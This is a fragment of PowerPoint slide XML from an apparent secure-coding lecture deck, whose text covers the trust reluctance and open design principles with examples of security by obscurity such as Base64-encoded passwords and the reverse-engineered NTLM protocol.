                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>38</a:t>
            </a:r>
            <a:endParaRPr sz="90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639013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0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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t>Reluctance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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29396" y="1267123"/>
            <a:ext cx="10182748" cy="2783750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72033" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="610"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="172668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Another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Unix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example demonstrates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converse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72033" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="172668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order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change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root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65" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>user,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need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two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things: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42797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23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kn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pass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42797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includ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i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Whe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oup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72033" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="835"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="172668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Suppose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you have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 application API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remote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management,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what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could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do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enforce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the </a:t>
            </a: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Reluctance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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Principle?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defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2399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30682" y="6450406"/>
            <a:ext cx="141568" cy="151284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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>39</a:t>
            </a:r>
            <a:endParaRPr sz="900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13936" y="3704773"/>
            <a:ext cx="2114760" cy="247641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73766" y="6392509"/>
            <a:ext cx="4633023" cy="330114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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cartoonstock.com/newscartoons/cartoonists/lla/lowres/computers-website-</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126"/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retina_scan-urine_sample-authentication-password-llan1069l.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="100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639013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0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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t>Reluctance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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32268"/>
            <a:ext cx="9963730" cy="1152225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5078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  <a:tab pos="8922248" algn="l"/>
              </a:tabLst>
            </a:pP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need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 connect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third-party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server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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exchange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data.	How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-10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do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establish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trust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server?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484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How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do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establish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data?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30682" y="6450406"/>
            <a:ext cx="141568" cy="151284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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>40</a:t>
            </a:r>
            <a:endParaRPr sz="900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6919" y="2237543"/>
            <a:ext cx="2694460" cy="290093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10859" y="6410183"/>
            <a:ext cx="3987396" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="10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courtesy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="10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of: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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.savagechickens.com/images/chickentrust.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="100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Common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Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Trust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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Reluctance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="6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–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267122"/>
            <a:ext cx="9641234" cy="2296832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Alias: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Partitioning,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Distribution,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-9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Separation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Privilege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60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199" spc="60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way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minimize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effect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breach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60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199" spc="60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way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increase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intra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inter-application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40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199" spc="-4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increase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flexibility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application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without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compromising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35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operate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securely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unsecured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environment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30682" y="6450406"/>
            <a:ext cx="141568" cy="151284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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>41</a:t>
            </a:r>
            <a:endParaRPr sz="900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0222" y="3776381"/>
            <a:ext cx="2142186" cy="214370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32397" y="6410183"/>
            <a:ext cx="4613978" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000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courtesy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000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of:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="10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https://shirt.hoboninja.com/images/products/TrustMeDance_002.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="100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639013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0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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t>Reluctance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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9415867" cy="2123522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Consequences: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20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Reluctance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provides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deep,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independent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reliable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defense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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="5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parts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independently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secure,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so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flexibly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plug into </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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different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environments</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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easily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interoperate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other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programs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90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="20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More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difficult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program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5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Requires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deeper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insight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functionality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30682" y="6450406"/>
            <a:ext cx="141568" cy="151284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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>42</a:t>
            </a:r>
            <a:endParaRPr sz="9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37268" y="6410183"/>
            <a:ext cx="3627445" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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https://shirt.hoboninja.com/images/products/TrustMeDance_002.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="100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6565"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-2177"/>
            <a:ext cx="12188825" cy="686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0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639013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0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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t>Reluctance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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10082444" cy="4513039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must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created,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not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assumed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clear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distinctions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between</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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privilege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levels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when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users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resources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587199" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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user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authenticated,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also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authorization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2199" spc="-67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resource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25"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Allowing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access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simply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because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authentication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Knowing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page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exists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sufficient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gain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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Require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authentication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and/or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authorization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Assume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any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under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complete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control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completely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untrustworthy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Minimize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set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components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trusted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2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ersonn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l,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sy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tems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4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atio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Fewer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trusted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components</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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means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fewer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systems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insure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safety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30682" y="6450406"/>
            <a:ext cx="141568" cy="151284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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>43</a:t>
            </a:r>
            <a:endParaRPr sz="90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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2639427"/>
            <a:ext cx="3470641" cy="2737472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="35551" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Design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6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Establish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Boundaries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6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Don't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Reinvent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Wheel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7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Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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Mechanism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55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199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Reluctance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55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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-6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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Design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7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Minimize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Attack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Surface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55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Weakest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Link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62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639013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0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5" dirty="0"/>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Design-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40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32267"/>
            <a:ext cx="10344630" cy="3725209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5078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Principle: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security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 a component or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system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should not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depend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on the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secrecy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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design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implementation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629731" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40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Kerckhoff's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Principle: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Crypto-systems</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="7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remain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even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when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attacker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knows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all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internal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details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(stated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1883)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47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Keys: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secret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data that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must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protected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1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Also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known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as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avoiding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"Security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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by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Obscurity"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highly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unlikely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any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algorithm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method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kept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secret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Ma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pe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ple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kn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Attackers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guess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probe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application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5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40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own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documentation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may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reveal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secrets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639013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0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5" dirty="0"/>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Design-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Examples</a:t>
            </a:r>
            <a:endParaRPr sz="2499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2779" y="3769822"/>
            <a:ext cx="4566592" cy="2260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3911" y="1267122"/>
            <a:ext cx="10573171" cy="3910581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687499" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="610"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="688133" algn="l"/>
              </a:tabLst>
            </a:pP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Passing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Base64-encoded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passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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the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URL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(AKA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Base-64</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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encryption)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687499" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="688133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Hiding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house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key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under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mat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687499" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="505"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="688133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Binding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admin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web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application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different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port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687499" marR="481186" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="844"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="688133" algn="l"/>
                <a:tab pos="8641662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NT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LAN</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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Manager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authentication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protocol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was</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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kept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secret;	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10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Samba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development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team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reverse-engineered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found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several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bugs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defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2349">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355493" marR="4573168" indent="-343432" defTabSz="914126">
              <a:buClr>
                <a:srgbClr val="00AFEF"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="355493" algn="l"/>
                <a:tab pos="356128" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Client-side hashing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>was </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>based on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>client-side </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-5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399" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1024</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> characters</a:t>
            </a:r>
            <a:endParaRPr sz="2399">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355493" marR="4949610" indent="-343432" defTabSz="914126">
              <a:buClr>
                <a:srgbClr val="00AFEF"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="355493" algn="l"/>
                <a:tab pos="356128" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The algorithm </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>seeding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>process was </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-5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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>easily</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> discovered</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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399" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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399" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>client-side </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr sz="2399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63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755409" y="6287076"/>
            <a:ext cx="5072329" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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courtesy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="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of:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.icanbarelydraw.com/comic/2039&amp;ei=9D5NU-_fHOamsQTj_IDYAw</a:t>
            </a:r>
            <a:endParaRPr sz="100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64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639013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0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5" dirty="0"/>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-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590041" y="1332268"/>
            <a:ext cx="10682362" cy="4533354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511022" marR="5078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511655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Openness applies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algorithms and implementation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details,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but not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data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like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encryption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keys</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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passwords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(the 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Keys)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511022" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="484"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="511655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more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review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testing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3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code,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more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secure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it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becomes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511022" marR="875402" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="830"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="511655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depend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possession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easy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protect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passwords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keys,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 ignorance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attacker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defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2299">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="181556" indent="-169494" defTabSz="914126">
              <a:buClr>
                <a:srgbClr val="2B97C5"/>
              </a:buClr>
              <a:buSzPct val="110416"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="182190" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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399" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>includes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>processes</a:t>
            </a:r>
            <a:endParaRPr sz="2399">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756058" lvl="1" indent="-287569" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="1145"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756058" algn="l"/>
                <a:tab pos="756693" algn="l"/>
              </a:tabLst>
            </a:pP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The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>existence</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>backdoors</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
